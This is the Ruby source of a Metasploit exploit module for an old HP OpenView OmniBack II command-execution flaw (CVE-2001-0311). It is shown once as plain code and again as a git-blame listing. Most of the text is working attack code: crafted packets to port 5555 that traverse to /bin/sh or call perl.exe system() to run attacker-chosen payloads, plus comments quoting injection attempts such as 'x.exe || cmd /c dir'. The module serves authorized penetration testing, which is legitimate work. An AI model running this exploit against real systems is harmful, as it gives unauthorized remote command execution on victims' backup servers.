modules/exploits/multi/misc/openview_omniback_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HP OpenView OmniBack II Command Execution',
      'Description'    => %q{
          This module uses a vulnerability in the OpenView Omniback II
        service to execute arbitrary commands. This vulnerability was
        discovered by DiGiT and his code was used as the basis for this
        module.

        For Microsoft Windows targets, due to module limitations, use the
        "unix/cmd/generic" payload and set CMD to your command. You can only
        pass a small amount of characters (4) to the command line on Windows.
      },
      'Author'         => [ 'hdm', 'aushack' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2001-0311'],
          ['OSVDB', '6018'],
          ['BID', '11032'],
          ['URL', 'http://www.securiteam.com/exploits/6M00O150KG.html'],
        ],
      'Platform'       => ['unix'], # win
      'Arch'           => ARCH_CMD,
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'       => 1024,
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl telnet',
            }
        },
      'Targets'        =>
        [
          [ 'Unix', { }],
          [ 'Windows', { }],
        ],
      'DisclosureDate' => '2001-02-28',
      'DefaultTarget' => 0))

    register_options(
      [
        Opt::RPORT(5555)
      ])
  end

  def check

    if (target.name =~ /Unix/)
      connect

      poof =
        "\x00\x00\x00.2"+
        "\x00 a"+
        "\x00 0"+
        "\x00 0"+
        "\x00 0"+
        "\x00 A"+
        "\x00 28"+
        "\x00/../../../bin/sh"+
        "\x00\x00"+
        "digit "+
        "AAAA\n\x00"

      sock.put(poof)
      sock.put("echo /etc/*;\n")
      res = sock.get_once(-1, 5)
      disconnect

      if !(res and res.length > 0)
        vprint_status("The remote service did not reply to our request")
        return Exploit::CheckCode::Safe
      end

      if (res =~ /passwd|group|resolv/)
        vprint_status("The remote service is exploitable")
        return Exploit::CheckCode::Vulnerable
      end

      return Exploit::CheckCode::Safe
    end

    if (target.name =~ /Windows/)
      connect

      poof =
        "\x00\x00\x00.2"+
        "\x00 a"+
        "\x00 0"+
        "\x00 0"+
        "\x00 0"+
        "\x00 A"+
        "\x00 28"+
        "\x00\\perl.exe"+
        "\x00\x20-e\x20system(dir)\x00\x00"+
        "digit "+
        "AAAA\n\x00"

      sock.put(poof)
      res = sock.get_once(-1, 5)
      disconnect

      print_status(res.to_s)

      if !(res and res.length > 0)
        print_status("The remote service did not reply to our request")
        return Exploit::CheckCode::Safe
      end

      if (res =~ /V.o.l.u.m.e/) #Unicode
        print_status("The remote service is exploitable")
        return Exploit::CheckCode::Vulnerable
      end

      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    if (target.name =~ /Unix/)
      connect

      poof =
        "\x00\x00\x00.2"+
        "\x00 a"+
        "\x00 0"+
        "\x00 0"+
        "\x00 0"+
        "\x00 A"+
        "\x00 28"+
        "\x00/../../../bin/sh"+
        "\x00\x00"+
        "digit "+
        "AAAA\n\x00"

      sock.put(poof)
      sock.put(payload.encoded + ";\n")
      res = sock.get_once(-1, 5)

      if !(res and res.length > 0)
        print_status("The remote service did not reply to our request")
        disconnect
        return
      end

      print(res)

      handler
      disconnect
    end

    if (target.name =~ /Windows/)

      # aushack
      #
      # Tested during pen test against Windows 2003 server.
      # Windows Service details:
      # - Data Protector Inet
      # -> [HP OpenView Storage Data Protector] - Backup client service
      # -> "C:\Program Files\OmniBack\bin\omniinet.exe"
      # -> OmniInet service for Windows NT
      # -> File version: 6.0.0.0
      #
      # This needs to be cleaned up later. Preferably using the Windows/cmd/perl payloads.
      #
      # Notes:
      # I was unable to use directory traversal, OR (||) or AND (&&) techniques to directly run cmd.exe
      # Perhaps a difference in Windows/Unix code? Logs:
      #
      #11/11/2008 12:18:37 PM  INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384
      #A request 28 (..\foo.exe) came from host [attacker] which is not a cell manager of this client
      #
      #11/11/2008 12:18:37 PM  INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384
      #[RxNtIntegUtil] parameter refused: ..\foo.exe
      #
      #11/11/2008 12:21:59 PM  INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384
      #A request 28 (x.exe || cmd /c dir > c:) came from host [attacker] which is not a cell manager of this client
      #
      #11/11/2008 12:21:59 PM  INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384
      #[RxNtIntegUtil] parameter refused: x.exe || cmd /c dir > c:
      #
      #11/11/2008 12:22:40 PM  INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384
      #A request 28 (perl.exe && cmd /c dir >) came from [attacker] which is not a cell manager of this client
      #
      #11/11/2008 12:22:40 PM  INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384
      #[RxNtIntegUtil] parameter refused: perl.exe && cmd /c dir >

      connect

      poof =
        "\x00\x00\x00.2"+
        "\x00 a"+
        "\x00 0"+
        "\x00 0"+
        "\x00 0"+
        "\x00 A"+
        "\x00 28"+
        "\x00\\perl.exe"+
        "\x00\x20-esystem(#{payload.encoded})\x00\x00"+
        "digit "+
        "AAAA\n\x00"

      sock.put(poof)
      #sock.put(payload.encoded + "\n")
      res = sock.get_once(-1, 5)

      if !(res and res.length > 0)
        print_status("The remote service did not reply to our request")
        disconnect
        return
      end

      print(res)

      handler
      disconnect
    end
  end
end
Updated to support Windows targets. 2008-11-13 09:01:24 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Updated to support Windows targets. 2008-11-13 09:01:24 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! 2009-12-06 05:50:37 +00:00			`Rank = ExcellentRanking`
Retab modules 2013-08-30 16:28:54 -05:00
Updated to support Windows targets. 2008-11-13 09:01:24 +00:00			`include Msf::Exploit::Remote::Tcp`
Retab modules 2013-08-30 16:28:54 -05:00
Updated to support Windows targets. 2008-11-13 09:01:24 +00:00			`def initialize(info = {})`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`super(update_info(info,`
Updated to support Windows targets. 2008-11-13 09:01:24 +00:00			`'Name' => 'HP OpenView OmniBack II Command Execution',`
			`'Description' => %q{`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`This module uses a vulnerability in the OpenView Omniback II`
			`service to execute arbitrary commands. This vulnerability was`
			`discovered by DiGiT and his code was used as the basis for this`
			`module.`
Retab modules 2013-08-30 16:28:54 -05:00
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`For Microsoft Windows targets, due to module limitations, use the`
			`"unix/cmd/generic" payload and set CMD to your command. You can only`
			`pass a small amount of characters (4) to the command line on Windows.`
Updated to support Windows targets. 2008-11-13 09:01:24 +00:00			`},`
Change author name to nick. 2017-11-09 03:00:24 +11:00			`'Author' => [ 'hdm', 'aushack' ],`
Updated to support Windows targets. 2008-11-13 09:01:24 +00:00			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`['CVE', '2001-0311'],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`['OSVDB', '6018'],`
Updated to support Windows targets. 2008-11-13 09:01:24 +00:00			`['BID', '11032'],`
			`['URL', 'http://www.securiteam.com/exploits/6M00O150KG.html'],`
			`],`
			`'Platform' => ['unix'], # win`
			`'Arch' => ARCH_CMD,`
			`'Privileged' => false,`
			`'Payload' =>`
			`{`
			`'Space' => 1024,`
			`'DisableNops' => true,`
Added a new set of match flags for cmd injection exploits (RequiredCmds). This reduces the number of 'bad' payloads listed for explot modules. A good example is disabling the netcat -e payloads for old Solaris exploits 2009-07-21 15:20:35 +00:00			`'Compat' =>`
			`{`
			`'PayloadType' => 'cmd',`
			`'RequiredCmd' => 'generic perl telnet',`
			`}`
Updated to support Windows targets. 2008-11-13 09:01:24 +00:00			`},`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`'Targets' =>`
Updated to support Windows targets. 2008-11-13 09:01:24 +00:00			`[`
			`[ 'Unix', { }],`
			`[ 'Windows', { }],`
			`],`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2001-02-28',`
Updated to support Windows targets. 2008-11-13 09:01:24 +00:00			`'DefaultTarget' => 0))`
Retab modules 2013-08-30 16:28:54 -05:00
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`register_options(`
			`[`
			`Opt::RPORT(5555)`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
Updated to support Windows targets. 2008-11-13 09:01:24 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Updated to support Windows targets. 2008-11-13 09:01:24 +00:00			`def check`
Retab modules 2013-08-30 16:28:54 -05:00
Updated to support Windows targets. 2008-11-13 09:01:24 +00:00			`if (target.name =~ /Unix/)`
			`connect`
Retab modules 2013-08-30 16:28:54 -05:00
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`poof =`
tons of indentation fixes, some other style tweaks 2010-09-20 08:06:27 +00:00			`"\x00\x00\x00.2"+`
			`"\x00 a"+`
			`"\x00 0"+`
			`"\x00 0"+`
			`"\x00 0"+`
			`"\x00 A"+`
			`"\x00 28"+`
			`"\x00/../../../bin/sh"+`
			`"\x00\x00"+`
			`"digit "+`
			`"AAAA\n\x00"`
Retab modules 2013-08-30 16:28:54 -05:00
Updated to support Windows targets. 2008-11-13 09:01:24 +00:00			`sock.put(poof)`
			`sock.put("echo /etc/*;\n")`
			`res = sock.get_once(-1, 5)`
			`disconnect`
Retab modules 2013-08-30 16:28:54 -05:00
Another large number of warnings fixed by Yoann Guillot 2009-10-25 17:18:23 +00:00			`if !(res and res.length > 0)`
Saving progress 2014-01-21 13:03:36 -06:00			`vprint_status("The remote service did not reply to our request")`
Updated to support Windows targets. 2008-11-13 09:01:24 +00:00			`return Exploit::CheckCode::Safe`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Updated to support Windows targets. 2008-11-13 09:01:24 +00:00			`if (res =~ /passwd\|group\|resolv/)`
Saving progress 2014-01-21 13:03:36 -06:00			`vprint_status("The remote service is exploitable")`
Updated to support Windows targets. 2008-11-13 09:01:24 +00:00			`return Exploit::CheckCode::Vulnerable`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Updated to support Windows targets. 2008-11-13 09:01:24 +00:00			`return Exploit::CheckCode::Safe`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Updated to support Windows targets. 2008-11-13 09:01:24 +00:00			`if (target.name =~ /Windows/)`
			`connect`
Retab modules 2013-08-30 16:28:54 -05:00
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`poof =`
tons of indentation fixes, some other style tweaks 2010-09-20 08:06:27 +00:00			`"\x00\x00\x00.2"+`
			`"\x00 a"+`
			`"\x00 0"+`
			`"\x00 0"+`
			`"\x00 0"+`
			`"\x00 A"+`
			`"\x00 28"+`
			`"\x00\\perl.exe"+`
			`"\x00\x20-e\x20system(dir)\x00\x00"+`
			`"digit "+`
			`"AAAA\n\x00"`
Retab modules 2013-08-30 16:28:54 -05:00
Updated to support Windows targets. 2008-11-13 09:01:24 +00:00			`sock.put(poof)`
			`res = sock.get_once(-1, 5)`
			`disconnect`
Retab modules 2013-08-30 16:28:54 -05:00
Updated to support Windows targets. 2008-11-13 09:01:24 +00:00			`print_status(res.to_s)`
Retab modules 2013-08-30 16:28:54 -05:00
Another large number of warnings fixed by Yoann Guillot 2009-10-25 17:18:23 +00:00			`if !(res and res.length > 0)`
Updated to support Windows targets. 2008-11-13 09:01:24 +00:00			`print_status("The remote service did not reply to our request")`
			`return Exploit::CheckCode::Safe`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Updated to support Windows targets. 2008-11-13 09:01:24 +00:00			`if (res =~ /V.o.l.u.m.e/) #Unicode`
			`print_status("The remote service is exploitable")`
			`return Exploit::CheckCode::Vulnerable`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Updated to support Windows targets. 2008-11-13 09:01:24 +00:00			`return Exploit::CheckCode::Safe`
			`end`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Updated to support Windows targets. 2008-11-13 09:01:24 +00:00			`def exploit`
			`if (target.name =~ /Unix/)`
			`connect`
Retab modules 2013-08-30 16:28:54 -05:00
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`poof =`
tons of indentation fixes, some other style tweaks 2010-09-20 08:06:27 +00:00			`"\x00\x00\x00.2"+`
			`"\x00 a"+`
			`"\x00 0"+`
			`"\x00 0"+`
			`"\x00 0"+`
			`"\x00 A"+`
			`"\x00 28"+`
			`"\x00/../../../bin/sh"+`
			`"\x00\x00"+`
			`"digit "+`
			`"AAAA\n\x00"`
Retab modules 2013-08-30 16:28:54 -05:00
Updated to support Windows targets. 2008-11-13 09:01:24 +00:00			`sock.put(poof)`
			`sock.put(payload.encoded + ";\n")`
			`res = sock.get_once(-1, 5)`
Retab modules 2013-08-30 16:28:54 -05:00
Another large number of warnings fixed by Yoann Guillot 2009-10-25 17:18:23 +00:00			`if !(res and res.length > 0)`
Updated to support Windows targets. 2008-11-13 09:01:24 +00:00			`print_status("The remote service did not reply to our request")`
			`disconnect`
			`return`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Updated to support Windows targets. 2008-11-13 09:01:24 +00:00			`print(res)`
Retab modules 2013-08-30 16:28:54 -05:00
Updated to support Windows targets. 2008-11-13 09:01:24 +00:00			`handler`
			`disconnect`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Updated to support Windows targets. 2008-11-13 09:01:24 +00:00			`if (target.name =~ /Windows/)`
Retab modules 2013-08-30 16:28:54 -05:00
Change author name to nick. 2017-11-09 03:00:24 +11:00			`# aushack`
Updated to support Windows targets. 2008-11-13 09:01:24 +00:00			`#`
			`# Tested during pen test against Windows 2003 server.`
			`# Windows Service details:`
			`# - Data Protector Inet`
			`# -> [HP OpenView Storage Data Protector] - Backup client service`
			`# -> "C:\Program Files\OmniBack\bin\omniinet.exe"`
			`# -> OmniInet service for Windows NT`
			`# -> File version: 6.0.0.0`
			`#`
			`# This needs to be cleaned up later. Preferably using the Windows/cmd/perl payloads.`
			`#`
			`# Notes:`
			`# I was unable to use directory traversal, OR (\|\|) or AND (&&) techniques to directly run cmd.exe`
			`# Perhaps a difference in Windows/Unix code? Logs:`
			`#`
			`#11/11/2008 12:18:37 PM INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384`
			`#A request 28 (..\foo.exe) came from host [attacker] which is not a cell manager of this client`
			`#`
			`#11/11/2008 12:18:37 PM INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384`
			`#[RxNtIntegUtil] parameter refused: ..\foo.exe`
			`#`
			`#11/11/2008 12:21:59 PM INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384`
			`#A request 28 (x.exe \|\| cmd /c dir > c:) came from host [attacker] which is not a cell manager of this client`
			`#`
			`#11/11/2008 12:21:59 PM INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384`
			`#[RxNtIntegUtil] parameter refused: x.exe \|\| cmd /c dir > c:`
			`#`
			`#11/11/2008 12:22:40 PM INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384`
			`#A request 28 (perl.exe && cmd /c dir >) came from [attacker] which is not a cell manager of this client`
			`#`
			`#11/11/2008 12:22:40 PM INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384`
			`#[RxNtIntegUtil] parameter refused: perl.exe && cmd /c dir >`
Retab modules 2013-08-30 16:28:54 -05:00
Updated to support Windows targets. 2008-11-13 09:01:24 +00:00			`connect`
Retab modules 2013-08-30 16:28:54 -05:00
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`poof =`
tons of indentation fixes, some other style tweaks 2010-09-20 08:06:27 +00:00			`"\x00\x00\x00.2"+`
			`"\x00 a"+`
			`"\x00 0"+`
			`"\x00 0"+`
			`"\x00 0"+`
			`"\x00 A"+`
			`"\x00 28"+`
			`"\x00\\perl.exe"+`
			`"\x00\x20-esystem(#{payload.encoded})\x00\x00"+`
			`"digit "+`
			`"AAAA\n\x00"`
Retab modules 2013-08-30 16:28:54 -05:00
Updated to support Windows targets. 2008-11-13 09:01:24 +00:00			`sock.put(poof)`
			`#sock.put(payload.encoded + "\n")`
			`res = sock.get_once(-1, 5)`
Retab modules 2013-08-30 16:28:54 -05:00
Another large number of warnings fixed by Yoann Guillot 2009-10-25 17:18:23 +00:00			`if !(res and res.length > 0)`
Updated to support Windows targets. 2008-11-13 09:01:24 +00:00			`print_status("The remote service did not reply to our request")`
			`disconnect`
			`return`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Updated to support Windows targets. 2008-11-13 09:01:24 +00:00			`print(res)`
Retab modules 2013-08-30 16:28:54 -05:00
Updated to support Windows targets. 2008-11-13 09:01:24 +00:00			`handler`
			`disconnect`
			`end`
			`end`
Massive OSVDB reference update from Steve Tornio. 2009-06-07 20:20:42 +00:00			`end`